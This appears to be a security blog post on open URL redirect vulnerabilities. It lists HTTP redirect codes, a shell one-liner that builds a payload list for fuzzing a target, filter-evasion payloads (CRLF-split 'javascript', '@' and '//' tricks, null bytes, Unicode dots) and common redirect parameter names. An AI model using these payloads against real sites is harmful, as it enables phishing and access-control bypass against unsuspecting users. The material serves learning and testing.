Posted by In the ever-evolving landscape of web applications, the pursuit of convenience is often shadowed by emerging cybersecurity threats. One such discreet menace is open URL redirection. This vulnerability surfaces when web applications unwittingly trust unvalidated user input, creating an avenue for attackers to manipulate redirects and potentially compromise user data. In this comprehensive exploration, we will delve into the intricacies of open URL redirection, explore advanced exploitation techniques, and shed light on effective measures to fortify against these insidious attacks.
Understanding Open URL Redirection:
Unvalidated redirects and forwards pose a severe risk to web applications. By exploiting this vulnerability, attackers can redirect users to malicious sites, often with URLs cunningly crafted to mimic the structure of the original site. This not only enhances the efficacy of phishing attempts but also enables attackers to circumvent access control checks, granting unauthorized access to privileged functions.
Exploitation Scenarios:
Open redirect vulnerabilities are a versatile weapon in an attacker’s arsenal, facilitating a spectrum of malicious scenarios. From orchestrating phishing campaigns to pilfering sessions and coercing users into unintended actions, the ramifications are extensive. Consider a scenario where a seemingly innocuous link, such as:
https://example-app.com/redirect?target=https://urchoice.com
An attacker could seamlessly replace urchoice.com with a link to a nefarious website. Disseminating this link through phishing emails or other channels can redirect unsuspecting users to the attacker’s site, perpetuating a cycle of exploitation.
HTTP Redirection Status Codes:
Understanding open URL redirection requires familiarity with HTTP redirection status codes. These codes, starting with 3, signal that additional action is required. Key codes include:
- 300 Multiple Choices
- 301 Moved Permanently
- 302 Found
- 303 See Other
- 304 Not Modified
- 305 Use Proxy
- 307 Temporary Redirect
- 308 Permanent Redirect
Each code imparts specific instructions to the client, determining whether the redirection is permanent or temporary.
Advanced Tools and Techniques:
1. Fuzzing:
Fuzzing emerges as a pivotal technique in identifying vulnerabilities. By systematically replacing whitelisted domains in test cases, potential weaknesses can be laid bare. A code snippet facilitates this process:
TARGET_DOMAIN="www.example-target.com" && sed 's/www.whitelisteddomain.tld/'"$TARGET_DOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$TARGET_DOMAIN".txt && echo "$TARGET_DOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$TARGET_DOMAIN".txt
2. Evading Filters with Ingenious Techniques:
- Using a whitelisted domain or keyword:
www.whitelisted-evil.comredirects toevil.com - Employing CRLF to bypass “javascript” blacklisted keyword:
java%0d%0ascript%0d%0a:alert(0) - Utilizing “//” & “////” to bypass “http” blacklisted keyword:
//hijacked.com////hijacked.com - Harnessing “https:” to bypass “//” blacklisted keyword:
https:hijacked.com - Employing “\/\/” to bypass “//” blacklisted keyword (Browsers see \/\/ as //):
\/\/hijacked.com//\/hijacked.com/ - Using “%E3%80%82” to bypass “.” blacklisted character:
/?redir=hijacked。com//hijacked%E3%80%82com - Leveraging null byte “%00” to bypass blacklist filter:
//hijacked%00.com - Introducing parameter pollution:
?next=whitelisted.com&next=hijacked.com - Employing the “@” character, where browsers redirect to anything after the “@”:
http://victim-site.com@attack-site.com/ - Crafting a folder as their domain:
http://attack-site.com/http://victim-site.com/http://attack-site.com/folder/www.folder.com - Using “?” character, where browsers translate it to “/?”:
http://attack-site.com?http://victim-site.com/http://attack-site.com?folder/www.folder.com - Host/Split Unicode Normalization:
https://evil-c.com—>https://evil-ca/c.example.comhttp://a.com/X.b.com
3. Common Injection Parameters:
/{payload}?next={payload}?url={payload}?target={payload}?rurl={payload}?dest={payload}?destination={payload}?redir={payload}?redirect_uri={payload}?redirect_url={payload}?redirect={payload}/redirect/{payload}/cgi-bin/redirect.cgi?{payload}/out/{payload}/out?{payload}?view={payload}/login?to={payload}?image_url={payload}?go={payload}?return={payload}?returnTo={payload}?return_to={payload}?checkout_url={payload}?continue={payload}?return_path={payload}
Conclusion:
While open URL redirection might seem like a subtle vulnerability, its potential impact is profound. Navigating the evolving landscape of web security necessitates a keen awareness of such threats. Security practitioners, developers, and users must stay informed and adopt best practices to mitigate the risks associated with open URL redirection. The ongoing battle for a secure web environment demands staying one step ahead of potential threats as the key to success.
Spyboy blog 